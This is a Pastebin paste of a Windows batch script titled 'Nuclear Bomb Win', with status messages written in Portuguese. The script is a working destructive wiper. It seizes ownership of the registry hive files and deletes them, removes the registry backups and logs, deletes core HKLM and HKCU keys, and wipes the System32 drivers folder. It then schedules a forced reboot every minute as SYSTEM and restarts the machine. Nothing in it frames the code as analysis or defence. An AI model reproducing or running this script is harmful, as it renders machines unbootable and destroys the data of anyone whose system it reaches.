Advertisement
DarkProgrammer000

Nuclear Bomb Win

May 21st, 2025
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.41 KB | None | 0 0
  1. @echo off
  2. title [!] Registro.exe — Nível Darkseid Ativado
  3. color 0c
  4.  
  5. echo [+] Inicializando protocolo de destruição total...
  6. timeout /t 3 /nobreak >nul
  7.  
  8. :: Eleva privilégios (requer estar rodando como admin)
  9. cd /d %SystemRoot%\System32\config
  10.  
  11. echo [+] Assumindo posse dos arquivos do Registro...
  12. takeown /f * /r /d y >nul
  13. icacls * /grant Everyone:F /t >nul
  14.  
  15. echo [+] Apagando arquivos principais do Registro...
  16. del /f /q SAM SYSTEM SOFTWARE SECURITY DEFAULT >nul
  17.  
  18. echo [+] Apagando backups do Registro...
  19. if exist RegBack (
  20.     takeown /f RegBack\* /r /d y >nul
  21.     icacls RegBack\* /grant Everyone:F /t >nul
  22.     del /f /q RegBack\* >nul
  23. )
  24.  
  25. echo [+] Corrompendo logs do Registro...
  26. del /f /q *.LOG* >nul
  27. echo. > SYSTEM
  28. echo. > SAM
  29. echo. > SOFTWARE
  30.  
  31. echo [+] Deletando chaves do Registro ativamente...
  32. reg delete "HKLM\SYSTEM" /f
  33. reg delete "HKLM\SOFTWARE" /f
  34. reg delete "HKLM\SECURITY" /f
  35. reg delete "HKLM\SAM" /f
  36. reg delete "HKCU\Software" /f
  37.  
  38. echo [+] Apagando drivers e arquivos de boot...
  39. takeown /f C:\Windows\System32\drivers /r /d y >nul
  40. icacls C:\Windows\System32\drivers /grant Everyone:F /t >nul
  41. del /f /q C:\Windows\System32\drivers\*.* >nul
  42.  
  43. echo [+] Criando loop de falha com agendador de tarefas...
  44. schtasks /create /tn "CrashLoop" /tr "shutdown -r -f -t 0" /sc minute /mo 1 /ru System >nul
  45.  
  46. echo [+] Tudo foi apagado. Você não verá esse sistema voltar.
  47. shutdown -r -f -t 0
  48.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement